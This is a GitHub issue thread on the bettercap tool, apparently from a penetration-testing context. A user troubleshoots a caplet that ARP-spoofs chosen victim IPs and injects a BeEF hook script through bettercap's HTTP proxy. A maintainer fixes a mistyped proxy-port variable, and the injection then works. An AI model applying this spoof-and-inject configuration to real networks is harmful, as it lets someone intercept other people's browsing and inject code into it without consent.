### ISSUE TITLE
I'm using http.proxy but I got an cert error on https website

### ISSUE THREAD

**Issue by uemahra** [bettercap/bettercap#637]
Please provide:

    Bettercap version you are using ( bettercap -version ).
    bettercap v2.24.1 (built for linux amd64 with go1.11.6) [type 'help' for a list of commands]
    OS version and architecture you are using.
    kali
    Go version if building from sources.
    Command line arguments you are using.
    bettercap -caplet beef-active.cap -eval "set arp.spoof.targets 172.16.56.144,172.16.56.150;"
    Caplet code you are using or the interactive session commands.

    set http.proxy.script /usr/share/bettercap/caplets/beef_inject.js

    http.proxy on

    set arp.spoof.whitelist 172.16.56.1-143,172.16.56.145-149,172.16.56.151-254

    set arp.spoof.internal true

    sleep 1

    arp.spoof on

Steps to Reproduce

    First Step
    Second Step
    and so on...

Hi, I'm using http.proxy to inject js code, and it's fine, but when i open a https website, it got “There is a problem witt  the website’s security ceritificate” , I don't want to mitm https traffic, I don't even have a "https.proxy on" in my cap file. How to solve it?

**Comment by buffermet** [comment]
Can't make out exactly what the issue is, we need some more info.

Please first of all make sure that the browser you are testing with does not have a HTTPS proxy configured, this could lead to a certificate error, but I doubt that is the case here.

What we need to see is details about the wrong certificate so we can verify whether it's indeed a certificate that bettercap issued.

**Comment by buffermet** [comment]
Also please provide the contents of the `beef-active.cap` caplet file that you're using.

**Comment by uemahra** [comment]
Hi buffmet,
I got this error on Chrome, using IE have a similar error, and a same error code. 
```
Your connection is not private
Attackers might be trying to steal your information from github.com (for example, passwords, messages, or credit cards). Learn more
NET::ERR_CERT_AUTHORITY_INVALID

Help improve Safe Browsing by sending some system information and page content to Google. Privacy policy
github.com normally uses encryption to protect your information. When Google Chrome tried to connect to github.com this time, the website sent back unusual and incorrect credentials. This may happen when an attacker is trying to pretend to be github.com, or a Wi-Fi sign-in screen has interrupted the connection. Your information is still secure because Google Chrome stopped the connection before any data was exchanged.

You cannot visit github.com right now because the website uses HSTS. Network errors and attacks are usually temporary, so this page will probably work later.
```

The command I use is:
`bettercap -caplet beef-active.cap`

And the content of beef-active.cap is:
```
set http.proxy.script beef-inject.js
set http.port 8080

http.proxy on

set arp.spoof.targets 172.16.56.144
# wait for everything to start properly
sleep 1
# make sure probing is off as it conflicts with arp spoofing
arp.spoof on
```

The reason I use `set http.port 8080` is because the environment I'm in uses a Blue Coat http proxy to access the internet. After the command executed, I can see the gateway's mac address on victim machine has changed to Kali's, and when access http website, the beef-inject.js successful loaded, but when access https websites all got this error.

**Comment by buffermet** [comment]
`http.port` is not a valid variable. You need to use `http.proxy.port`. 8080 is already the default HTTP proxy port of bettercap.

Please check the certificate and confirm that it is the same that was generated by bettercap.

**Comment by uemahra** [comment]
Wow, after change to http.proxy.port, Everything works good now :)

**Comment by buffermet** [comment]
Awesome :)
